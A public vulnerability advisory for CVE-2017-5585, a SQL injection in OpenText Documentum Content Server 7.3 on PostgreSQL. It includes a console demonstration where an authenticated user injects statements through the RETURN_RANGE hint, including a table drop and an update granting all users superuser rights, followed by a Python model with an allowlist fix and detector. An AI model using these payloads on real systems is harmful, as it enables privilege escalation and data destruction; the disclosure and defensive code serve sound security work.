OpenText Documentum Content Server 7.3 SQL Injection
Posted on 18 February 2017
CVE Identifier: CVE-2017-5585
Vendor: OpenText
Affected products: OpenText Documentum Content Server 7.3 (PostgreSQL builds only)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available

Description:
The previously announced fix for CVE-2014-2520 appears to be incomplete. When Content Server runs on a PostgreSQL database and the return_top_results_row_based configuration option is set to false, Content Server does not properly restrict the arguments of DQL hints: the sort clause passed as the third argument of the RETURN_RANGE hint is concatenated verbatim into the ORDER BY clause of the generated SQL (see the get_last_sql output below). Any remote authenticated repository user (the demonstration uses the built-in dm_bof_registry account) can therefore terminate the statement with a semicolon and append arbitrary DML/DDL statements, which the database executes in the context of the Content Server's own database connection, for example to grant every repository user superuser privileges.

Demonstration:
================================================================8<==============================================================
Connecting to Server using docbase DCTM_PSQL
[DM_SESSION_I_SESSION_START]info: "Session 0102987880002902 started for user dm_bof_registry."
Connected to Documentum Server running Release 7.3.0000.0214 Linux64.Postgres
--
-- Amount of superusers in Documentum repository
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
1
(1 row affected)
--
-- Demonstration of how Content Server translates DQL query to SQL
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')
2> go
[DM_QUERY_E_CURSOR_ERROR]error: "A database error has occurred during the creation of a cursor (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it; Error while executing the query')."
1> exec get_last_sql
2> go
result
-------------------------------------------------------------------------------------------
select all CAST(count(*) as int) from dm_user_sp dm_user order by 1;drop table dm_user_s;
1321 Commit
1321 Commit
(1 row affected)
--
-- Exploitation
--
1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')
2> go
count
------------
67
(1 row affected)
--
-- Amount of superusers in Documentum repository after exploitation
--
1> select count(*) from dm_user where user_privileges=16
2> go
count
------------
67
(1 row affected)
1>
================================================================>8==============================================================

Disclosure timeline:
2014.02.22: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure

__
Regards,
Andrey B. Panfilov
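Appendix (added illustration; this is not Content Server code and not part of the advisory's demonstration). The Python model below reconstructs the translation visible in the get_last_sql output above: the RETURN_RANGE sort clause is spliced verbatim into the generated ORDER BY, so a semicolon in it ends the statement and anything after it runs as a second statement. Beside it sits the allowlist check a fix would need (only column positions, plain identifiers and ASC/DESC are accepted), and the same check exposed as a detector that can be run over DQL captured from Content Server logs or a DFC proxy. The regular expressions, the function names, the constant SQL body and the benign third sample query are assumptions of this example; the two attack queries are the ones from the advisory.

```python
import re

# Added example: a model of the RETURN_RANGE hint translation, not Content Server code.

# The hint as it appears in the advisory: ENABLE (RETURN_RANGE first last 'sort clause').
# The sort clause is a single-quoted string; a doubled quote is taken as an
# escaped quote (an assumption of this model, not documented behaviour).
RETURN_RANGE_RE = re.compile(
    r"ENABLE\s*\(\s*RETURN_RANGE\s+(\d+)\s+(\d+)\s+'((?:[^']|'')*)'\s*\)",
    re.IGNORECASE,
)

# Allowlist for a legitimate sort clause: comma-separated column positions or
# (optionally dotted) identifiers, each optionally followed by ASC or DESC.
_SORT_TERM = (
    r"(?:\d+|[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)?)"
    r"(?:\s+(?:ASC|DESC))?"
)
SAFE_SORT_RE = re.compile(
    rf"^\s*{_SORT_TERM}(?:\s*,\s*{_SORT_TERM})*\s*$", re.IGNORECASE
)

# Stand-in for the SQL body Content Server produced in the advisory's
# get_last_sql output (constant here; the real server derives it from the query).
SQL_BODY = "select all CAST(count(*) as int) from dm_user_sp dm_user"


def parse_return_range(dql):
    """Return (first, last, sort_clause) from the RETURN_RANGE hint, or None if absent."""
    m = RETURN_RANGE_RE.search(dql)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2)), m.group(3).replace("''", "'")


def vulnerable_sql(dql):
    """Model of the unpatched behaviour: the sort clause is concatenated verbatim."""
    parsed = parse_return_range(dql)
    if parsed is None:
        return SQL_BODY
    return f"{SQL_BODY} order by {parsed[2]}"


def hardened_sql(dql):
    """Model of a fix: only a clause matching the allowlist may reach ORDER BY."""
    parsed = parse_return_range(dql)
    if parsed is None:
        return SQL_BODY
    sort_clause = parsed[2]
    if SAFE_SORT_RE.match(sort_clause) is None:
        raise ValueError(f"RETURN_RANGE sort clause rejected: {sort_clause!r}")
    return f"{SQL_BODY} order by {sort_clause}"


def hardened_rejects(dql):
    """True if the hardened translation refuses the query."""
    try:
        hardened_sql(dql)
    except ValueError:
        return True
    return False


def is_injection_attempt(dql):
    """Detection use: True if a RETURN_RANGE hint carries a sort clause outside the allowlist."""
    parsed = parse_return_range(dql)
    return parsed is not None and SAFE_SORT_RE.match(parsed[2]) is None


# Constructed sample queries: the two from the advisory plus one benign hint.
SAMPLE_QUERIES = [
    "select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;')",
    "select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;')",
    "select user_name from dm_user ENABLE (RETURN_RANGE 1 10 'user_name desc')",
]

if __name__ == "__main__":
    for dql in SAMPLE_QUERIES:
        print("DQL:        ", dql)
        print("vulnerable: ", vulnerable_sql(dql))
        try:
            print("hardened:   ", hardened_sql(dql))
        except ValueError as exc:
            print("hardened:   ", exc)
        print("flagged:    ", is_injection_attempt(dql))
        print()
```

For the first sample the vulnerable translation reproduces the get_last_sql line from the demonstration byte for byte, which is the point: the database receives two statements where the query author wrote one. The allowlist is deliberately narrow; a real fix could also bind the sort columns against the query's select list, but rejecting anything that is not a plain sort list already closes the semicolon path shown here.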